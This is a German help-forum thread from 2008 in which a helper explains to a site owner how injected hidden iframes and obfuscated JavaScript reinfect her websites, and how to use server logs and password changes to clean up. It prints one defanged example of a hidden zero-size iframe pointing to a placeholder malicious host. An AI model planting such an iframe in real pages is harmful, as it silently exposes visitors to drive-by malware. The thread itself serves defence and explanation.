Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 10.05.2008, 10:43   #1
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Ich habe seit Tagen folgendes Problem.
Ich bekomme immer wieder von kaspersky eine Meldung dass sich ein Trojaner auf meiner HP eingeschlichen hat und auch bei einer Hp die ich für meine Kollegin gemacht habe (trojan-clicker.html.iframegt und trojan-downloader.JS.iframe.gt und trojan-clicker.J.S.Agent.h

Nun, wenn ich die HP vom Server lösche und wieder hochlade, habe ich für 1-2 Tage ruhe, dann kommt die Meldung wieder.

www.creamore.ch
und im Background www.creamore.ch/kontakt.htm
die andere heisst
www.bluemelade.ch

Nun hat mir jemand gesagt, dass evtl im Quellcode was falsch ist...
kann mir von euch jemand sagen, ob vielleicht im Quellcode von der Index Seite was falsch ist?
Denn ich habe nichts gefunden.
DANKE

ach ja, mit Kaspersky hatte ich Kontakt die haben mir folgendes geschrieben:

wir haben nochmals intensiv Ihre Webseite untersucht. Leider muss ich Ihnen mitteilen, dass sich eine Bedrohung auf der Seite befindet
„Trojan-Downloader.HTML.IFrame.ds“.

Eventuell könnte die Homepage gehakt wurden sein.
Ich bitte Sie, ihre Homepage erneut auf den Server zu laden.

_________________________________

das habe ich nun schon zigmal gemacht..nach ca 1-2 Tage kommt aber wieder diese Meldung..sniff...
Ich möchte einfach verstehen um was es sich hier genau handelt, was das für Folgen für meine Homepagebesucher hat und wie ich dieses Unding wieder loswerde...+"*ç%&/

vielen lieben Dank jetzt schon im voraus...

Alt 11.05.2008, 06:17   #2
KarlKarl
/// Helfer-Team
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Hi,

ich habe gerade auf beiden Seiten nichts feststellen können, außer dass die eine offline ist. Dein Bericht deutet aber stark darauf hin, dass die Seiten auf dem Server infiziert werden.

Erstmal solltest Du versuchen, wenn es Meldungen des Scanners gibt, die Dateien in die Quarantäne schieben zu lassen. dort kann man sie wieder rausholen, um sie zu untersuchen.

Dann hilft es, wenn sich der Zeitraum, in dem die Infektion geschehen ist, möglichst klein einengen lässt. Für diesen Zeitraum müsstest Du dann die Logs durchsehen, und zwar HTTP und FTP (über das die Seite ja wohl hochgeladen wird).

Aller Wahrscheinlichkeit nach wird die Seite um etwas Code erweitert. Entweder ein Stück Javascript oder ein Iframe, beide dienen aber dem Zweck, dass zusätzlich von einem anderen Server was geladen wird, was dann versucht den Computer zu infizieren. Auf Systemen mit aktueller Software und sicherer Konfiguration passiert da normalerweise nichts, gefährlich ist es für Systeme, denen Updates fehlen, die Fehler beseitigen, deren Ausnutzung zur Ausführung von schadhaftem Code führen kann.

Gruß, Karl
__________________


Alt 11.05.2008, 06:32   #3
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



@KarlKarl
offline?? offline ist keine Seite.
meine eigene creamorehp lauft im Background und die erreicht man über
www.creamore.ch/kontakt.htm

Ich habe nun beim FTP Account das Passwort geändert, alles gelöscht und nochmals hochgeladen.
Bis jetzt habe ich auch keine Meldung bekommen.

Dein Zitat hier verstehe ich nicht ganz...soorry...ggg..bin Hausmama und kein CompiProfi..gggggg....

Aller Wahrscheinlichkeit nach wird die Seite um etwas Code erweitert. Entweder ein Stück Javascript oder ein Iframe, beide dienen aber dem Zweck, dass zusätzlich von einem anderen Server was geladen wird, was dann versucht den Computer zu infizieren. Auf Systemen mit aktueller Software und sicherer Konfiguration passiert da normalerweise nichts, gefährlich ist es für Systeme, denen Updates fehlen, die Fehler beseitigen, deren Ausnutzung zur Ausführung von schadhaftem Code führen kann.
__________________

Alt 11.05.2008, 07:54   #4
KarlKarl
/// Helfer-Team
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Über den Umweg mit der Kontakt-Seite habe ich dann auch Seiten gesehen, ich meinte die Startseite, die das verkündet.

Sorry. da Du Webdesign machst, bin ich davon ausgegangen, dass dir z.B. IFRAME ein Begriff ist. Für eine bösartige Anwendung reicht es aus, ein paar Zeichen an eine HTML-Datei anzuhängen. Ungefähr sowas (hab anstelle von "iframe" "ifra_me" geschrieben, damit die Gefahr von Fehlalarmen durch diese Forumsseite hoffentlich Null ist):
Code:
ATTFilter
<ifra_me src="http://boese_seite.com/" width="0" height="0" style="visibility:hidden"></ifra_me>
         
Ohne dass man es sieht, wird in die Seite der Inhalt von boese_seite.com geladen und der kann beliebig boese sein.

Die Javascript-Variante könnte erstmal einen Code entschlüsseln, dabei kommt dann der IFRAME bei heraus, derdann mit document.write() in die Seite geschrieben wird, womit er ebenfalls geladen wird. Alternativ könnte bei der Entschlüsselung auch ein Script rauskommen, das direkt versucht Fehler im Browser auszunutzen.

Es gibt sehr viele Möglichkeiten, am Ende läuft es aber immer darauf hinaus, dass versucht wird, ein schadhaftes Programm auf dem Computer zur Ausführung zu bringen. Das kann dann ein kleiner Donwloader sein, der eine Anzahl weiter Viren, Würmer, Trojaner runterlädt und ebenfalls ausführt. Damit das abe funktionieren kann, muss entweder eine fehlerhafte Software auf dem Computer sein, bei der ein entsprechend präpariertes Datenpaket zur Programmausführung führt oder die Konfiguration des Systems fehlerhaft sein, das Webseiten einfach alles erlaubt wird (z.B. die automatische Ausführung von Programmen).

Ich würde jetzt erstmal abwarten (und natürlich sehr oft kontrollieren, ob es in Ordnung ist). wenn Du Glück hast, war es der Wechsel des FTP-Passworts schon. Bleibt allerdings die Frage offen, wie es dann verraten werden konnte. Solltest Du auf deinem Computer einen Keylogger haben, wäre das neue Passwort schon jetzt verraten.

Für jeden Zugriff auf eine Seite deines Webangebots zeichnet der Webserver Informationen in einem Log auf. Datum und Zeit, IP, welche Seite, usw, eine Menge mehr. Ebenso zeichnet der FTP-Server für jeden Zugriff auf den Webspace, also das hoch- bzuw. runterladen einer Datei Informationen auf. Datum und Zeit, IP, welche Datei, ihre größe, usw. Wenn es wieder zu Veränderungen kommt, ist es wichtig, für den Zeitraum, in dem die Veränderungen passiert sind, in diese Logs zu schauen. Es kann einem, wie gerade in einem anderen Thread hier im Forum geschehen, verraten, auf welchem Weg die Veränderungen erfolgt sind. Dort bin ich in den FTP-Logs fündig geworden. Diese Logs solltest Du auf jeden Fall laden.

Ach ja: Wenn Du die saubere Version der Seite hochlädst, muss auch noch kontrolliert werden, ob es im Webspace Dateien gibt, die nicht von dir sind. Es könnte dort jemand ein Backdoor-Sckript abgelegt haben. Die einfachste Variante ist es wohl, vor dem hochladen alles zu löschen. Besser fände ich es allerdings, von einer eventuell dort abgelegten Datei eine Kopie aufzubewahren.

Alt 11.05.2008, 07:59   #5
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



@KarlKarl
wow..vielen Dank für Deine ausführliche Antwort.
was ein Iframe ist, denke ich weiss ich, aber meine HP ist ja ohne Frames gemacht.
werde nun aber sicher immer wieder überprüfen!
ich konnte das PW nur mal bei meiner creamore hp ändern.
mal schauen wie es weiter geht.
werde hier sicher auf dem laufenden halten.

nochmals vielen herzlichen DANK!!!!!
und das noch an Pfingsten..wow....


Alt 11.05.2008, 08:06   #6
KarlKarl
/// Helfer-Team
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Teile der beiden Seiten habe ich mir ja auch im Quelltext angesehen, sind ja recht übersichtlich, ich habe auch nichts gesehen, was mir kritisch erscheinen würde. Der IFRAME eines solchen Angreifers wird aber eingefügt, am einfachsten einfach hinten an die Datei angehängt. Das hat nichts damit zu tun, ob Du Frames benutzt oder nicht.

Alt 11.05.2008, 08:29   #7
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



dann mache ich davon mal eine Kopie und falls sich der Trojaner wieder melden würde dann auch eins, habe ich das so richtig verstanden??

welches Logfile ist wichtig?
habe eins das heisst:
access.log
und
access.log.prossed
und
error.log
und
xferlog. regular
und
xferlog.log.prossed

Alt 11.05.2008, 08:30   #8
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Zitat:
Zitat von KarlKarl Beitrag anzeigen
Teile der beiden Seiten habe ich mir ja auch im Quelltext angesehen, sind ja recht übersichtlich, ich habe auch nichts gesehen, was mir kritisch erscheinen würde. Der IFRAME eines solchen Angreifers wird aber eingefügt, am einfachsten einfach hinten an die Datei angehängt. Das hat nichts damit zu tun, ob Du Frames benutzt oder nicht.
so lieb von dir, danke...
verstehe ich dich richtig, dass wenn sich der Trojaner wieder melden würde ich im quellcode also das sehen würde (iframe...etc)???

Alt 11.05.2008, 18:41   #9
KarlKarl
/// Helfer-Team
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



In access.log wird jeder Zugriff auf eine Seite in deinem Webangebot festgehalten. Mir ist nicht klar, wass die Logs mit "prossed" hinten dran darstellen, aber im Zweifelsfall würde ich erstmal alles sichern. xferlog ist das FTP-Log.

Im acess kann man nach Hinweisen sehen, ob die Seite durch normale HTTP-Zugriffe, das was jeder Surfer mit seinem Browser machen kann, angegriffen/verändert wurde. Dafür müsste es auf dem Server ausnutzbare Dateien/Software geben, danach sieht es mir nicht aus.

Im xferlog kann man nachsehen, ob die Seite über FTP verändert wurde.

Beides setzt natürlich voraus, dass der Angreifer sich keine Zugriffsrechte auf diese Logs verschaffen konnte. Ansonsten kann es sein, dass er alle Spuren dort wieder getilgt hat. Über die beiden geschilderten Varianten sollte ihm das abrer nicht möglich gewesen sein.


Ja. wenn die Meldung wiederkommt, dann kannst du den Quelltext der bemängelten Seite mit der sauberen Version deiner lokalen Kopie vergleichen. Da Du selber keine Iframes nutzt, wäre es eindeutig, wenn einer vorhanden ist. Javascriipt ist es nur wenig, da sollte eine Zugabe auch leicht auffallen.

Achtung: Die Blumenladen-Seite ist derzeit infiziert!

Geändert von KarlKarl (11.05.2008 um 18:45 Uhr) Grund: Warnung

Alt 11.05.2008, 19:51   #10
-SkY-
Gast
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Zitat:
Zitat von KarlKarl Beitrag anzeigen
Achtung: Die Blumenladen-Seite ist derzeit infiziert!
Ich weiß nich, wurde mittlerweile vielleicht behoben, aber mein kaspersky schweigt.

Alt 11.05.2008, 20:07   #11
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



stimmt bei blumenladen.ch kam heute Nachmittag plötzlich wieder eine Meldung.
ich fand aber nichts im Quellcode. (kein iframe etc)....

Nun habe ich auch dort das Passwort geändert und hoffe das ich nun bei beiden Ruhe habe.

danke für die ausführliche antwort bezüglich den locs...
werde bestimmt darauf zurückkommen wenn sich das Unding wieder meldet...

Alt 11.05.2008, 22:17   #12
KarlKarl
/// Helfer-Team
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Nein, kein Iframe (jedenfalls nicht direkt). Aber gleich hinter dem <body>-Tag war ein Stück Javascript eingefügt worden. Enthielt viele sehr zufällig aussehende Zeichenfolgen aus Ziffern und Buchstaben. Seine Aufgabe war es, einen Iframe zu entschlüsseln und, wie schon beschrieben, mit document.write() zu einem Teil der geladenen Startseite des Blumenladens zu machen. Der Iframe hat dann einen Zugriff auf einen Server in Russland getan.

Alt 12.05.2008, 05:42   #13
amore
 
auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Standard

auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??



Zitat:
Zitat von KarlKarl Beitrag anzeigen
Nein, kein Iframe (jedenfalls nicht direkt). Aber gleich hinter dem <body>-Tag war ein Stück Javascript eingefügt worden. Enthielt viele sehr zufällig aussehende Zeichenfolgen aus Ziffern und Buchstaben. Seine Aufgabe war es, einen Iframe zu entschlüsseln und, wie schon beschrieben, mit document.write() zu einem Teil der geladenen Startseite des Blumenladens zu machen. Der Iframe hat dann einen Zugriff auf einen Server in Russland getan.
Guten Morgen
?????????? ich habe die Seite nach der Meldung im Frontpage angeschaut und nichts von dem gesehen was du geschrieben hast.
Aber was du da schreibst, schauderet mich scho ein wenig.
Wie schon geschrieben, ich habe bei beiden HP's die Passwörter geändert und ich denke ich werd dies nun regelmässig vornehmen.
Ich hatte heute morgen riesengrossen Bammel meine CreamoreHp zu öffnen..
Doch es kam keine Meldung..uff....
Drückt mir die Daumen dass es so bleibt und ich kann micht echt nur bedanken, dass ihr mir so hilft...ist nicht selbstverständlich!!!
DANKE DANKE DANKE

Antwort

Themen zu auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??
andere, bedrohung, befindet, einfach, erneut, falsch, folge, folgendes, handel, homepage, immer wieder, index, kaspersky, liebe, lieben, meldung, nichts, nochmals, quellcode, seite, server, tagen, teile, teilen, troja, trojaner, verstehen, webseite



Ähnliche Themen: auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??


  1. Trojaner auf Webseite / Trojan-Downloader.JS.Iframe.dfe
    Plagegeister aller Art und deren Bekämpfung - 10.10.2013 (3)
  2. trojan-downloader.js.iframe.deb auf Website
    Plagegeister aller Art und deren Bekämpfung - 09.06.2013 (9)
  3. Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage
    Plagegeister aller Art und deren Bekämpfung - 08.02.2013 (19)
  4. HTML:IFrame-K [Trj]
    Plagegeister aller Art und deren Bekämpfung - 24.01.2013 (8)
  5. JS/TrojanDownloader.Iframe.NKE trojan/HTML/Fraud.BG trojan
    Log-Analyse und Auswertung - 30.09.2012 (3)
  6. HTML/Iframe.aho
    Plagegeister aller Art und deren Bekämpfung - 16.08.2012 (13)
  7. Malware IFrame auf meiner Homepage
    Plagegeister aller Art und deren Bekämpfung - 11.07.2012 (1)
  8. Trojan-Downloader.JS.Iframe.cqj
    Plagegeister aller Art und deren Bekämpfung - 20.12.2011 (0)
  9. Trojan-Downloader.JS.Iframe.bcl auf Homepage
    Plagegeister aller Art und deren Bekämpfung - 29.09.2009 (1)
  10. Trojan-Downloader.JS.Iframe.bhy
    Plagegeister aller Art und deren Bekämpfung - 03.07.2009 (4)
  11. Trojan-Clicker.HTML.IFrame.rp, System infiziert?
    Log-Analyse und Auswertung - 27.06.2009 (3)
  12. Trojan-Clicker.HTML.IFrame.ob ???
    Log-Analyse und Auswertung - 21.04.2008 (1)
  13. hijackthis log-file : Trojan.Exploit.Html.Iframe.Filedownload.FI
    Log-Analyse und Auswertung - 09.02.2008 (3)
  14. HTML/IFrame.aaa.100
    Mülltonne - 17.01.2008 (0)
  15. Antivir Update funktioniert nicht (HTML/IFrame.Age.tih & HEUR/Exploit.HTML gefunden)
    Plagegeister aller Art und deren Bekämpfung - 05.12.2007 (1)
  16. Trojan-Clicker.HTML.IFrame.ag
    Plagegeister aller Art und deren Bekämpfung - 01.10.2007 (1)
  17. Trojan-Clicker.HTML.IFrame.h
    Log-Analyse und Auswertung - 01.08.2006 (1)

Zum Thema auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? - Ich habe seit Tagen folgendes Problem. Ich bekomme immer wieder von kaspersky eine Meldung dass sich ein Trojaner auf meiner HP eingeschlichen hat und auch bei einer Hp die ich - auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??...
Archiv
Du betrachtest: auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun?? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.